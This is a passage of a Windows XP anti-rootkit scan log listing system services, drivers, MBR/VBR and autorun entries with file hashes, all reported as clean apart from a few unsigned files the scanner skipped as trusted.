13:18:36.0609 0x020c  [ 15CABD0F7C00C47C70124907916AF3F1, 66B5C978B7FB6359AD8BAC9F568FE9D469E358FEAB07B1F129BA9E85F1DF723E ] rdpdr           C:\WINDOWS\system32\DRIVERS\rdpdr.sys
13:18:36.0765 0x020c  rdpdr - ok
13:18:36.0796 0x020c  [ 43AF5212BD8FB5BA6EED9754358BD8F7, AF330F61CECA4AFA359CEABC5EB3227E6B56A9A2DCE50701381D665122D7356D ] RDPWD           C:\WINDOWS\system32\drivers\RDPWD.sys
13:18:36.0828 0x020c  RDPWD - ok
13:18:36.0859 0x020c  [ 3C37BF86641BDA977C3BF8A840F3B7FA, AB9A6E54DBA3F4561CD4837372BECCE0D73943D02E3288F944333039375AC08C ] RDSessMgr       C:\WINDOWS\system32\sessmgr.exe
13:18:37.0000 0x020c  RDSessMgr - ok
13:18:37.0031 0x020c  [ F828DD7E1419B6653894A8F97A0094C5, E6150E1F598BA4CFEDB8FF075BC0D576518C331B864388F1CAE8812EFF106ECF ] redbook         C:\WINDOWS\system32\DRIVERS\redbook.sys
13:18:37.0171 0x020c  redbook - ok
13:18:37.0234 0x020c  [ 7E699FF5F59B5D9DE5390E3C34C67CF5, 3FCF0442D80AB181FED4303E570378736AA1F8718C0B8B70F689A1E45200FFE4 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll
13:18:37.0390 0x020c  RemoteAccess - ok
13:18:37.0421 0x020c  [ 5B19B557B0C188210A56A6B699D90B8F, 0FA880B81AE615206FD1738B83428AAA491D54B24168339DE6E87FDE8C6C14B0 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll
13:18:37.0562 0x020c  RemoteRegistry - ok
13:18:37.0578 0x020c  [ D8B0B4ADE32574B2D9C5CC34DC0DBBE7, CDF10D3D8ADA7ADB1CC1567BFA986557C6D69F4099B70FDFABD4C3D09E3CA778 ] ROOTMODEM       C:\WINDOWS\system32\Drivers\RootMdm.sys
13:18:37.0718 0x020c  ROOTMODEM - ok
13:18:37.0718 0x020c  [ AAED593F84AFA419BBAE8572AF87CF6A, CC0FFC5A69394C8830DC66320DA01A820BBF41AD7E57D0FC343561DC5EF9A360 ] RpcLocator      C:\WINDOWS\system32\locator.exe
13:18:37.0859 0x020c  RpcLocator - ok
13:18:37.0890 0x020c  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] RpcSs           C:\WINDOWS\System32\rpcss.dll
13:18:37.0937 0x020c  RpcSs - ok
13:18:37.0968 0x020c  [ 471B3F9741D762ABE75E9DEEA4787E47, D9ADE42965EC22AEB4B2AD21D429C3C8232A60AA9853DEFDA7AED86A13FE8623 ] RSVP            C:\WINDOWS\system32\rsvp.exe
13:18:38.0109 0x020c  RSVP - ok
13:18:38.0125 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] SamSs           C:\WINDOWS\system32\lsass.exe
13:18:38.0250 0x020c  SamSs - ok
13:18:38.0281 0x020c  [ 39763504067962108505BFF25F024345, 73C9710B61EDC7FBEDE1D7A767AA3D3A169E7AD012494D05CB5EE7E5C5752BB9 ] SASDIFSV        C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
13:18:38.0296 0x020c  SASDIFSV - ok
13:18:38.0312 0x020c  [ 77B9FC20084B48408AD3E87570EB4A85, B5BC5FEC1356DECB66A7A671DB67112BDAC8F942BF1C4B986B1805B41EF362B1 ] SASKUTIL        C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
13:18:38.0328 0x020c  SASKUTIL - ok
13:18:38.0343 0x020c  [ 86D007E7A654B9A71D1D7D856B104353, 7B1DE53D637A5FC9619D5D07C48927AFEC89D959207F6F2E2F45DD054EEA04C7 ] SCardSvr        C:\WINDOWS\System32\SCardSvr.exe
13:18:38.0500 0x020c  SCardSvr - ok
13:18:38.0531 0x020c  [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA, 0B582F47BD70732BAC48B8B86E5D06CE7F299A20E8177F3F2E6F28217C3FB605 ] Schedule        C:\WINDOWS\system32\schedsvc.dll
13:18:38.0671 0x020c  Schedule - ok
13:18:38.0703 0x020c  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] Secdrv          C:\WINDOWS\system32\DRIVERS\secdrv.sys
13:18:38.0859 0x020c  Secdrv - ok
13:18:38.0875 0x020c  [ CBE612E2BB6A10E3563336191EDA1250, C331797DC3569F0E715766561DE2562F60B924378842246C35D2B1CF867E9D96 ] seclogon        C:\WINDOWS\System32\seclogon.dll
13:18:39.0031 0x020c  seclogon - ok
13:18:39.0046 0x020c  [ 7FDD5D0684ECA8C1F68B4D99D124DCD0, 7105B026F966A992430F86C3698ABE15EC73E4772F1A3E362E29FD5247A5DCA6 ] SENS            C:\WINDOWS\system32\sens.dll
13:18:39.0203 0x020c  SENS - ok
13:18:39.0234 0x020c  [ 0F29512CCD6BEAD730039FB4BD2C85CE, 4F98AE390D1B14A755700DD6CEFB9CF921F0404AF2145D2D7E5F52394F87C6A5 ] serenum         C:\WINDOWS\system32\DRIVERS\serenum.sys
13:18:39.0375 0x020c  serenum - ok
13:18:39.0406 0x020c  [ CCA207A8896D4C6A0C9CE29A4AE411A7, 5999B39242283CD803319AADCA171CCCC6E2A40FB2FAFA51B1D29F3FF2DD8D6C ] Serial          C:\WINDOWS\system32\DRIVERS\serial.sys
13:18:39.0546 0x020c  Serial - ok
13:18:39.0593 0x020c  [ 8E6B8C671615D126FDC553D1E2DE5562, CEEC0067514555D5CA489F50E3D7562FCA8DB8E952C3C878604C9277FC77959F ] Sfloppy         C:\WINDOWS\system32\drivers\Sfloppy.sys
13:18:39.0734 0x020c  Sfloppy - ok
13:18:39.0765 0x020c  [ 83F41D0D89645D7235C051AB1D9523AC, B681F33EEAA511D6A2DCB9FBAA407B739184C9FF6067C6B7E51F1FC37E9D4DD7 ] SharedAccess    C:\WINDOWS\System32\ipnathlp.dll
13:18:39.0937 0x020c  SharedAccess - ok
13:18:39.0968 0x020c  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
13:18:39.0984 0x020c  ShellHWDetection - ok
13:18:40.0000 0x020c  Simbad - ok
13:18:40.0015 0x020c  Sparrow - ok
13:18:40.0046 0x020c  [ AB8B92451ECB048A4D1DE7C3FFCB4A9F, DD17733CBB370FCA08F0296704D7CBEACA3C8F76D0ABE4761C3B1FFDF7481D9E ] splitter        C:\WINDOWS\system32\drivers\splitter.sys
13:18:40.0171 0x020c  splitter - ok
13:18:40.0218 0x020c  [ 60784F891563FB1B767F70117FC2428F, E0B07F08E60FFBAD36C2E58180F4B2A16DCA47716044CBE0213DF7B74D742F1F ] Spooler         C:\WINDOWS\system32\spoolsv.exe
13:18:40.0250 0x020c  Spooler - ok
13:18:40.0265 0x020c  [ 76BB022C2FB6902FD5BDD4F78FC13A5D, 6031CB2344D7277FC703480EB43CF856A0F8F818EA98FF26A2CA532336CD2DFA ] sr              C:\WINDOWS\system32\DRIVERS\sr.sys
13:18:40.0406 0x020c  sr - ok
13:18:40.0453 0x020c  [ 3805DF0AC4296A34BA4BF93B346CC378, B57A14F1B7B0997E619DDD62B73157AA2399A9852166FB58139CBB358A88F6F3 ] srservice       C:\WINDOWS\system32\srsvc.dll
13:18:40.0609 0x020c  srservice - ok
13:18:40.0656 0x020c  [ 47DDFC2F003F7F9F0592C6874962A2E7, 17C643BD4EB09B5666FE41817DC785BE04A6E491CE79E8E5A702CDBD98E1BDD7 ] Srv             C:\WINDOWS\system32\DRIVERS\srv.sys
13:18:40.0687 0x020c  Srv - ok
13:18:40.0703 0x020c  [ 0A5679B3714EDAB99E357057EE88FCA6, 01E1A101FFF48402C77E385A78FEF27876E04533B60EB1C18558A737E57E5FA8 ] SSDPSRV         C:\WINDOWS\System32\ssdpsrv.dll
13:18:40.0843 0x020c  SSDPSRV - ok
13:18:40.0875 0x020c  [ A9573045BAA16EAB9B1085205B82F1ED, 6A4D68BCD4968C17451EB1C4AB420FFA844D089845520D222BC4A2BD14583C56 ] StillCam        C:\WINDOWS\system32\DRIVERS\serscan.sys
13:18:41.0000 0x020c  StillCam - ok
13:18:41.0031 0x020c  [ 8BAD69CBAC032D4BBACFCE0306174C30, 2AA0DA710FCBFF38FE8DA91EE02E7A4503269347E61F8D3246FCA3384BBA2305 ] stisvc          C:\WINDOWS\system32\wiaservc.dll
13:18:41.0203 0x020c  stisvc - ok
13:18:41.0265 0x020c  [ 2E5586392CDFBD1D73BADB20E9ED6386, 8C296A4EB50750D5CC59C8B96034017AD957F8BE09153196778A519F061876EA ] SupportSoft RemoteAssist C:\Program Files\Common Files\SupportSoft\bin\ssrc.exe
13:18:41.0296 0x020c  SupportSoft RemoteAssist - ok
13:18:41.0343 0x020c  [ 3941D127AEF12E93ADDF6FE6EE027E0F, EA1F0E32E1C5E90FA4AAC421DEBBE086512340758D3217A6334E886BCE638B51 ] swenum          C:\WINDOWS\system32\DRIVERS\swenum.sys
13:18:41.0484 0x020c  swenum - ok
13:18:41.0500 0x020c  [ 8CE882BCC6CF8A62F2B2323D95CB3D01, B408550A581F3DA222355964AFA4E976AD8471F0AA37573C42C4948AE5A23A3B ] swmidi          C:\WINDOWS\system32\drivers\swmidi.sys
13:18:41.0687 0x020c  swmidi - ok
13:18:41.0687 0x020c  SwPrv - ok
13:18:41.0703 0x020c  symc810 - ok
13:18:41.0718 0x020c  symc8xx - ok
13:18:41.0750 0x020c  [ B226F8A4D780ACDF76145B58BB791D5B, 6E8304956E9FD827A2FCAB0CB9D200500E8E71CE79C9909684666DD548D3FD31 ] symlcbrd        C:\WINDOWS\system32\drivers\symlcbrd.sys
13:18:41.0765 0x020c  symlcbrd - ok
13:18:41.0765 0x020c  sym_hi - ok
13:18:41.0781 0x020c  sym_u3 - ok
13:18:41.0781 0x020c  [ 8B83F3ED0F1688B4958F77CD6D2BF290, 546D3602183702B4F53E84413CFA2C933D64C8540378E54A8DCD148F3F36A2DA ] sysaudio        C:\WINDOWS\system32\drivers\sysaudio.sys
13:18:41.0921 0x020c  sysaudio - ok
13:18:41.0953 0x020c  [ C7ABBC59B43274B1109DF6B24D617051, 4384CA0AA6CE9B603CF7DB775A3C721E46715D5B120B94FB57DEADAADE18535B ] SysmonLog       C:\WINDOWS\system32\smlogsvc.exe
13:18:42.0109 0x020c  SysmonLog - ok
13:18:42.0156 0x020c  [ 3CB78C17BB664637787C9A1C98F79C38, F35C31F6B7F366CB949D1044B357C76DEC9170441C5E559802794F62B72FD255 ] TapiSrv         C:\WINDOWS\System32\tapisrv.dll
13:18:42.0296 0x020c  TapiSrv - ok
13:18:42.0343 0x020c  [ 9AEFA14BD6B182D61E3119FA5F436D3D, EA29E49434585409272E7901AF89771FE9D6E911A7DC44AB3C7020CFF8A44552 ] Tcpip           C:\WINDOWS\system32\DRIVERS\tcpip.sys
13:18:42.0375 0x020c  Tcpip - ok
13:18:42.0406 0x020c  [ 6471A66807F5E104E4885F5B67349397, F35CBFFB8BB235CCE30EF94A5273333900DD49FD506BF9D55D99A320B8A53A5A ] TDPIPE          C:\WINDOWS\system32\drivers\TDPIPE.sys
13:18:42.0546 0x020c  TDPIPE - ok
13:18:42.0562 0x020c  [ C56B6D0402371CF3700EB322EF3AAF61, 7743FA4C734BCE38EFB1CA69BC17364D8421E2CD172F856F7E38E7AE1EE93F2F ] TDTCP           C:\WINDOWS\system32\drivers\TDTCP.sys
13:18:42.0703 0x020c  TDTCP - ok
13:18:42.0718 0x020c  [ 88155247177638048422893737429D9E, B6D4E8691917946332C2208D01F8C8281978C1AD1E9951C5D99DF0D49AC34B3B ] TermDD          C:\WINDOWS\system32\DRIVERS\termdd.sys
13:18:42.0859 0x020c  TermDD - ok
13:18:42.0906 0x020c  [ FF3477C03BE7201C294C35F684B3479F, D6246521539BA4ACD022D26983182F5E323D2EF1EA7C54265A248C43A1CE5202 ] TermService     C:\WINDOWS\System32\termsrv.dll
13:18:43.0046 0x020c  TermService - ok
13:18:43.0078 0x020c  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] Themes          C:\WINDOWS\System32\shsvcs.dll
13:18:43.0093 0x020c  Themes - ok
13:18:43.0109 0x020c  [ DB7205804759FF62C34E3EFD8A4CC76A, 13A4248F528CE98ACA66898E56822E4FC49B11F491FF1F61A687BA601BF0A802 ] TlntSvr         C:\WINDOWS\system32\tlntsvr.exe
13:18:43.0265 0x020c  TlntSvr - ok
13:18:43.0265 0x020c  TosIde - ok
13:18:43.0296 0x020c  [ 55BCA12F7F523D35CA3CB833C725F54E, 849FB1AE31B143B14B298BBC0D91230693D41DEB95F46516878F53A7F4186C38 ] TrkWks          C:\WINDOWS\system32\trkwks.dll
13:18:43.0437 0x020c  TrkWks - ok
13:18:43.0453 0x020c  [ E0C67BE430C6DE490D6CCAECFA071F9E, 831858F9A07122FBE513FC56D79F39F973FC9BA757D509C113AA975DE8A70EE5 ] UBHelper        C:\WINDOWS\system32\drivers\UBHelper.sys
13:18:43.0453 0x020c  UBHelper - detected UnsignedFile.Multi.Generic ( 1 )
13:18:43.0453 0x020c  Detect skipped due to KSN trusted
13:18:43.0453 0x020c  UBHelper - ok
13:18:43.0468 0x020c  [ 5787B80C2E3C5E2F56C2A233D91FA2C9, 3774905CF77954DFCECDA5BCC7CDE3D0ED72712BFAAD85ADAE5246306447E46C ] Udfs            C:\WINDOWS\system32\drivers\Udfs.sys
13:18:43.0609 0x020c  Udfs - ok
13:18:43.0625 0x020c  ultra - ok
13:18:43.0671 0x020c  [ 402DDC88356B1BAC0EE3DD1580C76A31, 32A686595710336A6BFD54C03F552AE39439611662F84EF5D24193AE5665C6F3 ] Update          C:\WINDOWS\system32\DRIVERS\update.sys
13:18:43.0828 0x020c  Update - ok
13:18:43.0875 0x020c  [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91, 7746916DB48E3F5B243B63C066596AD9037A494BF1AD935946DD04AC85D983DF ] upnphost        C:\WINDOWS\System32\upnphost.dll
13:18:44.0031 0x020c  upnphost - ok
13:18:44.0046 0x020c  [ 05365FB38FCA1E98F7A566AAAF5D1815, 16843048CEEC3DAA3B953A12FF1EE339E86783A08F2A56DA7F94AD9F9717D77D ] UPS             C:\WINDOWS\System32\ups.exe
13:18:44.0187 0x020c  UPS - ok
13:18:44.0218 0x020c  [ 73B41F4EAD65F355962168D766AF0F2E, AA33CAE55D4766C9F1E9F1B50EEAE1CA4BE968380C89892A46D2D25EAEEDC64D ] USBAAPL         C:\WINDOWS\system32\Drivers\usbaapl.sys
13:18:44.0250 0x020c  USBAAPL - ok
13:18:44.0281 0x020c  [ 1B611611C28D2DF25BC057D79C6F13FC, B0D86F63E44B40413BBAE6402CC088046CFAE082D41BBC2ED5A916293356B846 ] usbccgp         C:\WINDOWS\system32\DRIVERS\usbccgp.sys
13:18:44.0296 0x020c  usbccgp - ok
13:18:44.0312 0x020c  [ 4BAC8DF07F1D8434FC640E677A62204E, 76C1351AF6752224BF59DEEE0F8665FE699F3DFD679F5BCD01C7D9383E6402A4 ] usbehci         C:\WINDOWS\system32\DRIVERS\usbehci.sys
13:18:44.0343 0x020c  usbehci - ok
13:18:44.0375 0x020c  [ 1AB3CDDE553B6E064D2E754EFE20285C, A99C4528C4227B1E96847614745AAFACD3C5F1BDFE435214DBF78740FFB300FE ] usbhub          C:\WINDOWS\system32\DRIVERS\usbhub.sys
13:18:44.0515 0x020c  usbhub - ok
13:18:44.0531 0x020c  [ A717C8721046828520C9EDF31288FC00, 1530BBE832EDBB0974AD89D723A03FF7A0094B368992D73C2C3E62A181DF1E0A ] usbprint        C:\WINDOWS\system32\DRIVERS\usbprint.sys
13:18:44.0687 0x020c  usbprint - ok
13:18:44.0718 0x020c  [ F8EDE2B6928970DCE3D5614C27D9E7F6, 6E5EBBC8B70C1D593634DAF0C190DEADFDA18C3CBC8F552A76F156F3869EF05B ] usbscan         C:\WINDOWS\system32\DRIVERS\usbscan.sys
13:18:44.0750 0x020c  usbscan - ok
13:18:44.0750 0x020c  [ A32426D9B14A089EAA1D922E0C5801A9, ED1DC52EE45F8EAD3AEC4B1F817BB25634141CF48295494C5947DCE6CF7A9817 ] USBSTOR         C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
13:18:44.0921 0x020c  USBSTOR - ok
13:18:44.0953 0x020c  [ 26496F9DEE2D787FC3E61AD54821FFE6, 8BE7FF647470B9A951CBB478FAF83D657A15CC78037F42348A6B738F21D523DA ] usbuhci         C:\WINDOWS\system32\DRIVERS\usbuhci.sys
13:18:45.0093 0x020c  usbuhci - ok
13:18:45.0093 0x020c  [ 0D3A8FAFCEACD8B7625CD549757A7DF1, B9CFDEFCD66AA139F3DC2F967B184669532922563AD5A71769BABDC4370D065E ] VgaSave         C:\WINDOWS\System32\drivers\vga.sys
13:18:45.0250 0x020c  VgaSave - ok
13:18:45.0250 0x020c  ViaIde - ok
13:18:45.0281 0x020c  [ 4C8FCB5CC53AAB716D810740FE59D025, 010EAC43DBED700B73E4FC908FAAF9F6A0168EBBD5D86751E49BC33AAA18BFA4 ] VolSnap         C:\WINDOWS\system32\drivers\VolSnap.sys
13:18:45.0421 0x020c  VolSnap - ok
13:18:45.0484 0x020c  [ 7A9DB3A67C333BF0BD42E42B8596854B, D31A9A3B1AAAB373EDD73B674102395212FCB616F829E938B7B2B7BE7D4752C5 ] VSS             C:\WINDOWS\System32\vssvc.exe
13:18:45.0640 0x020c  VSS - ok
13:18:45.0671 0x020c  [ 54AF4B1D5459500EF0937F6D33B1914F, FA1876888BCB9C72A92369DBED4FF1A8666784523FB41E618FA0919490FCDDB9 ] W32Time         C:\WINDOWS\system32\w32time.dll
13:18:45.0828 0x020c  W32Time - ok
13:18:45.0859 0x020c  [ E20B95BAEDB550F32DD489265C1DA1F6, 5589B2067E6C9FBA290D8C5EADDC198EBAF39C50C3CD7D2BC5CDA7CBFBC445E5 ] Wanarp          C:\WINDOWS\system32\DRIVERS\wanarp.sys
13:18:46.0015 0x020c  Wanarp - ok
13:18:46.0031 0x020c  [ 6768ACF64B18196494413695F0C3A00F, 3A8F8586F1D997D19A8478345338D2AECD785AEABDB61531DD3F92003D3230A5 ] wdmaud          C:\WINDOWS\system32\drivers\wdmaud.sys
13:18:46.0171 0x020c  wdmaud - ok
13:18:46.0218 0x020c  [ 77A354E28153AD2D5E120A5A8687BC06, 8B2D37A4443501C0A8E70BC2079BE27F0A36FD07B561E6F68B40A72EABBC2DFE ] WebClient       C:\WINDOWS\System32\webclnt.dll
13:18:46.0359 0x020c  WebClient - ok
13:18:46.0437 0x020c  [ 2D0E4ED081963804CCC196A0929275B5, E1D75C7D7233D81DFDE13160B0C80138DF8B35230D04FB79B367A52FACF69BF8 ] winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll
13:18:46.0578 0x020c  winmgmt - ok
13:18:46.0718 0x020c  [ 5144AE67D60EC653F97DDF3FEED29E77, F6238767284B2356A9F502E2ACCFAAC283FA13CBF238E98B5115A55179526B10 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
13:18:46.0781 0x020c  wlidsvc - ok
13:18:46.0812 0x020c  [ C51B4A5C05A5475708E3C81C7765B71D, F776D2680BD3407307B7072626F78460361FC5BC38623C9E16F394D300AB25DE ] WmdmPmSN        C:\WINDOWS\system32\MsPMSNSv.dll
13:18:46.0828 0x020c  WmdmPmSN - ok
13:18:46.0890 0x020c  [ E76F8807070ED04E7408A86D6D3A6137, BFCF5361B7335760A7AE4B6958DE516A27AC60AA09135A46F0B49F588FAFE3A0 ] Wmi             C:\WINDOWS\System32\advapi32.dll
13:18:46.0968 0x020c  Wmi - ok
13:18:47.0015 0x020c  [ E0673F1106E62A68D2257E376079F821, 12992F18C9653050B10DC61D12988067933FCFDF02123D3A7EF5DE607A785DDC ] WmiApSrv        C:\WINDOWS\system32\wbem\wmiapsrv.exe
13:18:47.0187 0x020c  WmiApSrv - ok
13:18:47.0296 0x020c  [ F74E3D9A7FA9556C3BBB14D4E5E63D3B, C71FAAC752F6D58BF8556661252DBF8C5DDD090CAE002A2C7E09C9A014526066 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\WMPNetwk.exe
13:18:47.0359 0x020c  WMPNetworkSvc - ok
13:18:47.0375 0x020c  [ CF4DEF1BF66F06964DC0D91844239104, CC1D9CECE2056D29A9651D51BB57C3F4F9BF9E90A4808CF7496C683C874FBD51 ] WpdUsb          C:\WINDOWS\system32\DRIVERS\wpdusb.sys
13:18:47.0390 0x020c  WpdUsb - ok
13:18:47.0515 0x020c  [ 15673BD0B86150CB8E27766059C72A9B, 56C23289A8BFF4945EE532CF6D62D3EC81B827CA15A359F30A327789F9FE9CAF ] WPFFontCache_v0400 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
13:18:47.0562 0x020c  WPFFontCache_v0400 - ok
13:18:47.0593 0x020c  [ 6ABE6E225ADB5A751622A9CC3BC19CE8, 4061C5D0F051DFF1730E2A3BFC1CCA97B29602FC50F10F6B44D93B0D28F42024 ] WS2IFSL         C:\WINDOWS\System32\drivers\ws2ifsl.sys
13:18:47.0750 0x020c  WS2IFSL - ok
13:18:47.0781 0x020c  [ 7C278E6408D1DCE642230C0585A854D5, DA46079A04F6E8E3441E4AE454AEAC02B3E935DE29CE7F6D4476F57867FCC12A ] wscsvc          C:\WINDOWS\system32\wscsvc.dll
13:18:47.0953 0x020c  wscsvc - ok
13:18:47.0984 0x020c  [ 35321FB577CDC98CE3EB3A3EB9E4610A, C9A6F5CF282D8FCB3CDFCC4B306013480E78E1B664E1A60A4E27B161F9FFD4CD ] wuauserv        C:\WINDOWS\system32\wuauserv.dll
13:18:48.0140 0x020c  wuauserv - ok
13:18:48.0171 0x020c  [ F15FEAFFFBB3644CCC80C5DA584E6311, 79B3E9AF35976CE49921E9BEA3BA3B4A8AF762FD3F284B62954038B5FFB32471 ] WudfPf          C:\WINDOWS\system32\DRIVERS\WudfPf.sys
13:18:48.0203 0x020c  WudfPf - ok
13:18:48.0234 0x020c  [ 28B524262BCE6DE1F7EF9F510BA3985B, AEFF02B899801A63CBB262757C3D4369E38BFF0690BD085DE60E873DFBE3C3F4 ] WudfRd          C:\WINDOWS\system32\DRIVERS\wudfrd.sys
13:18:48.0281 0x020c  WudfRd - ok
13:18:48.0296 0x020c  [ 05231C04253C5BC30B26CBAAE680ED89, 5C03C2D7E0B573646D32F4093E2FF2C3BA391C39F5BA37D67F69D38E357FCC3D ] WudfSvc         C:\WINDOWS\System32\WUDFSvc.dll
13:18:48.0328 0x020c  WudfSvc - ok
13:18:48.0375 0x020c  [ 81DC3F549F44B1C1FFF022DEC9ECF30B, 3D14BFEA539F9CEB16555BD56C5E3C7C8F6692FC62C2789F8AAEA1C042E63940 ] WZCSVC          C:\WINDOWS\System32\wzcsvc.dll
13:18:48.0546 0x020c  WZCSVC - ok
13:18:48.0578 0x020c  [ 295D21F14C335B53CB8154E5B1F892B9, 9418477C2E3EA93E93D931A4EDD4500DA568FAD6040204B5201D1080203B0BBC ] xmlprov         C:\WINDOWS\System32\xmlprov.dll
13:18:48.0734 0x020c  xmlprov - ok
13:18:48.0781 0x020c  [ 518C4D4DCB93C88316303694163BBD63, 93865CC9AEFEF2DD0E8025EE283AC57773EF13D38E03B73FBCE22FAB9D77D2AE ] yukonwxp        C:\WINDOWS\system32\DRIVERS\yk51x86.sys
13:18:48.0828 0x020c  yukonwxp - ok
13:18:48.0875 0x020c  [ 478B4415DFB3A45B6FE61EC781E07D7B, C48BFA226F594E4BFB722056C8EF9CCBB27504F181781284AE7151D2CDAF50DE ] ZD1211BU(ZyDAS) C:\WINDOWS\system32\DRIVERS\zd1211Bu.sys
13:18:48.0937 0x020c  ZD1211BU(ZyDAS) - ok
13:18:48.0968 0x020c  [ 3C185892DD5C13975966E8D1C2A65290, 665A4B5AC61A76A6E72B6C87ECE902617E8A03DD1E63418CF15EA988FDBD5B44 ] ZD1211U(ZyDAS)  C:\WINDOWS\system32\DRIVERS\zd1211u.sys
13:18:49.0015 0x020c  ZD1211U(ZyDAS) - ok
13:18:49.0031 0x020c  [ 00AE175B903D45ED4A62384D3315DC2A, FAAAD00B96DDCDEB396D479F89207A0EEC374871C6340AACDDB95BF289D6330C ] ZDPSp50         C:\WINDOWS\system32\Drivers\ZDPSp50.sys
13:18:49.0031 0x020c  ZDPSp50 - detected UnsignedFile.Multi.Generic ( 1 )
13:18:49.0031 0x020c  Detect skipped due to KSN trusted
13:18:49.0031 0x020c  ZDPSp50 - ok
13:18:49.0031 0x020c  ================ Scan global ===============================
13:18:49.0062 0x020c  [ 42F1F4C0AFB08410E5F02D4B13EBB623, 924C30587C51C0D1E1F47991969AF492A644552E15F2480EA991DCB74A3E68D5 ] C:\WINDOWS\system32\basesrv.dll
13:18:49.0125 0x020c  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:18:49.0140 0x020c  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:18:49.0171 0x020c  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] C:\WINDOWS\system32\services.exe
13:18:49.0171 0x020c  [ Global ] - ok
13:18:49.0171 0x020c  ================ Scan MBR ==================================
13:18:49.0187 0x020c  [ 99852D5C3A78447C3D6D82B6155FE848 ] \Device\Harddisk0\DR0
13:18:52.0125 0x020c  \Device\Harddisk0\DR0 - ok
13:18:52.0125 0x020c  ================ Scan VBR ==================================
13:18:52.0140 0x020c  [ BA29F0665A0180B8388AD44A01EA69CE ] \Device\Harddisk0\DR0\Partition1
13:18:52.0171 0x020c  \Device\Harddisk0\DR0\Partition1 - ok
13:18:52.0187 0x020c  [ EF7C7D20C938BDEB2E5C23C206B5B61F ] \Device\Harddisk0\DR0\Partition2
13:18:52.0187 0x020c  \Device\Harddisk0\DR0\Partition2 - ok
13:18:52.0187 0x020c  ================ Scan generic autorun ======================
13:18:52.0203 0x020c  LaunchApp - ok
13:18:52.0890 0x020c  [ 1674E54E4AB3D492C648AA43F731A540, D140986EB98342D75E693F0D05ADAB672DF9553593A97B9455C6407142672B41 ] C:\WINDOWS\RTHDCPL.EXE
13:18:53.0640 0x020c  RTHDCPL - ok
13:18:53.0843 0x020c  [ C74B86642F131D76C0EDE673FDF137B2, 91659969CF94979FA980A3C13AB3E7421048E4E2720DE6064E9B61FD4DF96666 ] C:\WINDOWS\SkyTel.EXE
13:18:54.0015 0x020c  SkyTel - ok
13:18:54.0093 0x020c  [ 27ECDC43B2E41A865092CC31263358F2, 3956B6E4EC45C37D47E9FF7382984B806691B9407E59A6377C51B05E5A6BE83D ] c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe
13:18:54.0125 0x020c  ntiMUI - detected UnsignedFile.Multi.Generic ( 1 )
13:18:54.0125 0x020c  Detect skipped due to KSN trusted
13:18:54.0125 0x020c  ntiMUI - ok
13:18:54.0156 0x020c  [ 8FB740D758B14B1BC950CC347C21E461, 6EAB429DE35D87C94E9B912E189C248428653674939352E0210FC026F5A4B564 ] C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
13:18:54.0156 0x020c  RemoteControl - detected UnsignedFile.Multi.Generic ( 1 )
13:18:54.0156 0x020c  Detect skipped due to KSN trusted
13:18:54.0156 0x020c  RemoteControl - ok
13:18:54.0203 0x020c  [ 7BBE4CF421AECC7F0226EDD75F12079F, 8E78FC5E0657DB066F9EBAADEA9AFECB1AAA570DD9C08C7ED42116704D2E379D ] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE
13:18:54.0359 0x020c  IMJPMIG8.1 - ok
13:18:54.0375 0x020c  [ E6BB63BBE1BED01769CA87F4DAC286C8, 6D1D7C7365FBF29C92398BC11D5713BC373E372D92C155DA0DBA3B86DD1705F7 ] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
13:18:54.0531 0x020c  IMEKRMIG6.1 - ok
13:18:54.0562 0x020c  [ 1B17E09C1223F6D17336D2DD7A1AF4F4, 06DFAD95007532CCF46D593EEDC2474936614AEDCEA7BF983E36DAD22F850B08 ] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe
13:18:54.0718 0x020c  MSPY2002 - ok
13:18:54.0765 0x020c  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
13:18:54.0906 0x020c  PHIME2002ASync - ok
13:18:54.0921 0x020c  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
13:18:55.0062 0x020c  PHIME2002A - ok
